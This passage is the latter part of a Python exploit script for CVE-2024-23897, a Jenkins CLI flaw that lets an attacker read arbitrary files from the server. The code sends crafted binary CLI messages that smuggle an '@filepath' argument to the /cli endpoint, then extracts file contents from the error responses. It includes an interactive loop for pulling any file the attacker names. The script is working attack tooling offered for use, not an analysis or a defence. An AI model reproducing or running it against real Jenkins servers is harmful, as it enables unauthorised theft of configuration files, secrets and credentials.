      if self.listen:  
        self.listen_and_print()

  def stop(self):  
    self.stop_thread = True

  def receive_next_message(self):  
    self.listen = True

  def wait_for_message(self):  
    while self.listen:  
      sleep(0.5)

  def print_formatted_output(self, output: str):  
    if "ERROR: No such file" in output:  
      print("File not found.")  
    elif "ERROR: Failed to parse" in output:  
      print("Could not read file.")

    expression = "No such agent \"(.*)\" exists."  
    results = findall(expression, output)  
    print("\n".join(results))

  def listen_and_print(self):  
    session = Session()  
    headers = {"Side": "download", "Session": self.identifier}  
    try:  
      response = session.post(self.url, params=self.params, headers=headers)  
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):  
      print("Could not connect to target to setup the listener.")  
      exit(1)

    self.print_formatted_output(response.text)  
    self.listen = False

  def send_file_request(self, filepath: str):  
    headers = {"Side": "upload", "Session": self.identifier}  
    payload = get_payload(filepath)  
    try:  
      post(self.url, data=payload, params=self.params, headers=headers, timeout=4)  
    except (exceptions.ConnectTimeout, exceptions.ConnectionError):  
      print("Could not connect to the target to send the request.")  
      exit(1)

  def read_file(self, filepath: str):  
    self.receive_next_message()  
    sleep(0.1)  
    self.send_file_request(filepath)  
    self.wait_for_message()

def get_payload_message(operation_index: int, text: str) -> bytes:  
  text_bytes = bytes(text, "utf-8")  
  text_size = len(text_bytes)  
  text_message = text_size.to_bytes(2) + text_bytes  
  message_size = len(text_message)

  payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message  
  return payload

def get_payload(filepath: str) -> bytes:  
  arg_operation = 0  
  start_operation = 3

  command = get_payload_message(arg_operation, "connect-node")  
  poisoned_argument = get_payload_message(arg_operation, f"@{filepath}")

  payload = command + poisoned_argument + start_operation.to_bytes(1)  
  return payload

def start_interactive_file_read(exploit: Exploit):  
  print("Press Ctrl+C to exit")  
  while True:  
    filepath = input("File to download:\n> ")  
    filepath = make_path_absolute(filepath)  
    exploit.receive_next_message()

    try:  
      exploit.read_file(filepath)  
    except exceptions.ReadTimeout:  
      print("Payload request timed out.")

def make_path_absolute(filepath: str) -> str:  
    if not filepath.startswith('/'):  
      return f"/proc/self/cwd/{filepath}"  
    return filepath

def format_target_url(url: str) -> str:  
  if url.endswith('/'):  
    url = url[:-1]  
  return f"{url}/cli"

def get_arguments():  
  parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897")  
  parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/")  
  parser.add_argument("-p", "--path", help="The absolute path of the file to download")  
  return parser.parse_args()

def main():  
  args = get_arguments()  
  url = format_target_url(args.url)  
  filepath = args.path  
  identifier = str(uuid4())

  exploit = Exploit(url, identifier)  
  exploit.start()

  if filepath:  
    filepath = make_path_absolute(filepath)  
    exploit.read_file(filepath)  
    exploit.stop()  
    return

  try:  
    start_interactive_file_read(exploit)  
  except KeyboardInterrupt:  
    pass  
  print("\nQuitting")  
  exploit.stop()

if __name__ == "__main__":  
  main()

Tag

#debian